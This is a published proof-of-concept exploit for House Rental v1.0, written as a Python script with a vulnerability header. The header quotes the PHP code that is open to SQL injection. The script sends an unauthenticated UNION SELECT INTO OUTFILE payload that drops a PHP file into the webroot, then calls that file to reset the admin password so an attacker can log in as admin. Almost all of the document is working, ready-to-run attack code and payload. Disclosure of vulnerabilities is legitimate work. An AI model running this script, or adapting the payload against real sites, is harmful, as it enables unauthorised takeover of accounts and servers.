# Exploit Title: House Rental v1.0 - PDO Bypass SQL Injection - Unauthenticated Code Execution - Change Admin Password # Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec) # Date: 2020-08-07 # Vendor Homepage: https://projectworlds.in # Software Link: https://projectworlds.in/wp-content/uploads/2019/06/home-rental.zip # Version: 1.0 # Tested On: Windows 10 Pro (x64_86) + XAMPP | Python 2.7 # CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') # OWASP Top Ten 2017: A1:2017-Injection # CVSS Base Score: 10.0 | Impact Subscore: 6.0 | Exploitability Subscore: 3.9 # CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H # Vulnerability Description: # House Rental v1.0 suffers from an unauthenticated SQL Injection vulnerability allowing remote attackers # to execute arbitrary code on the hosting webserver via sending a malicious POST request. # Vulnerable Source Code: # /config/config.php # 11 try { # 12 $connect = new PDO("mysql:host=".dbhost."; dbname=".dbname, dbuser, dbpass); # 13 $connect->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); # /index.php # 5 if(isset($_POST['search'])) { # 7 $keywords = $_POST['keywords']; # 11 $keyword = explode(',', $keywords); # 12 $concats = "("; # 13 $numItems = count($keyword); # 15 foreach ($keyword as $key => $value) { # 17 if(++$i === $numItems){ # 18 $concats .= "'".$value."'"; # 19 }else{ # 20 $concats .= "'".$value."',"; # 23 $concats .= ")"; # 47 $stmt = $connect->prepare("SELECT * FROM room_rental_registrations_apartment WHERE country IN $concats OR country IN $loc OR state IN $concats OR state IN $loc OR city IN $concats OR city IN $loc OR address IN $concats OR address IN $loc OR rooms IN $concats OR landmark IN $concats OR landmark IN $loc OR rent IN $concats OR deposit IN $concats"); # 48 $stmt->execute(); import requests, sys, re, json from colorama import Fore, Back, Style requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE] S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT] ok = S[3]+F[2]+')'+F[5]+'+++'+F[2]+'['+F[8]+'========> '+S[0]+F[0] err = S[3]+F[2]+'<========'+F[2]+'('+F[5]+'+++'+F[2]+'( '+F[0]+S[0] def sig(): SIG = F[2]+" .-----.._ ,--. "+F[5]+" .__ .__________\n" SIG += F[2]+" | .. > "+F[4]+"___"+F[2]+" | | .--. "+F[5]+" | |__ ___.__. __| _\\_____ \\ ______ ____ ____\n" SIG += F[2]+" | |.' ,'"+F[4]+"-'"+F[2]+"* *"+F[4]+"'-."+F[2]+" |/ /__ __ "+F[5]+" | | < | |/ __ | _(__ < / ____/ __ _/ ___\\\n" SIG += F[2]+" | <"+F[4]+"/ "+F[2]+"* * *"+F[4]+" \\ "+F[2]+"/ \\/ \\ "+F[5]+" | Y \\___ / /_/ | / \\\\___ \\\\ ___\\ \\___\n" SIG += F[2]+" | |> ) "+F[2]+"* *"+F[4]+" / "+F[2]+"\\ \\ "+F[5]+" |___| / ____\____ |/______ /____ >\\___ \\___ >\n" SIG += F[2]+" |____..- "+F[4]+"'-.._..-'"+F[2]+"_|\\___|._..\\___\\"+F[5]+" \\/\\/ \\/ \\/ \\/ \\/ \\/\n" SIG += F[2]+" "+F[2]+"_______github.com/boku7_____ "+F[5]+" _______github.com/hyd3sec____\n_"+F[0]+S[0] return SIG def header(): head = S[3]+F[2]+' --- House Rental v1.0 | SQL Injection - Change Admin Password ---\n'+S[0] return head def formatHelp(STRING): return S[3]+F[2]+STRING+S[0] if __name__ == "__main__": print(header()) print(sig()) if len(sys.argv) != 2: print(err+formatHelp("Usage:\t python %s " % sys.argv[0])) print(err+formatHelp("Example:\t python %s ''" % sys.argv[0])) sys.exit(-1) SERVER_URL = sys.argv[1] if not re.match(r".*/$", SERVER_URL): SERVER_URL = SERVER_URL+'/' INDEX_URL = SERVER_URL + 'index.php' EXECUTE_URL = SERVER_URL + 'execute.php' LOGIN_URL = SERVER_URL + 'auth/login.php' s = requests.Session() get_session = s.get(INDEX_URL, verify=False) pdata = {'keywords':'1337\') UNION SELECT all \'1,UPDATED,ADMIN,PASSWORD,TO,boku,aaaaaa,city,landmark,rent,deposit,plotnum,apartName,aptNum,rooms,floor,purpose,own,area,address,accomd,prepare("UPDATE users set password=\\\'17d8e2e8233d9a6ae428061cb2cdf226\\\' WHERE username=\\\'admin\\\'");$stmt->execute();?>,image,open,other,1,2020-08-01 14:42:11,2020-08-01 14:42:11,1\' into OUTFILE \'../../htdocs/home-rental/execute.php\' -- boku', 'location':'','search':'search'} SQLi = s.post(url=INDEX_URL, data=pdata, verify=False) if SQLi.status_code == 200: print(ok+"Sent "+F[2]+S[3]+"SQL Injection"+F[0]+S[0]+" POST Request to "+F[5]+S[3]+INDEX_URL+F[0]+S[0]+" with "+F[2]+S[2]+"payload"+F[0]+S[0]+":") print(S[3]+F[2]+json.dumps(pdata, sort_keys=True, indent=4)+F[0]+S[0]) else: print(err+'Cannot send payload to webserver.') sys.exit(-1) try: print(ok+"Executing "+F[2]+S[3]+"SQL Injection"+F[0]+S[0]+" payload to change "+F[2]+S[2]+"admin password"+F[0]+S[0]) EXECUTE = s.get(url=EXECUTE_URL, verify=False) except: print(err+'Failed to connect to '++F[2]+S[3]+EXECUTE_URL+F[0]+S[0]+'to execute payload') sys.exit(-1) print(ok+F[2]+S[3]+"SQL Injection payload executed!"+F[0]+S[0]) print(ok+F[2]+S[3]+"Login at "+F[5]+S[3]+LOGIN_URL+F[0]+S[0]+" with creds: "+F[2]+S[2]+"admin:boku"+F[0]+S[0])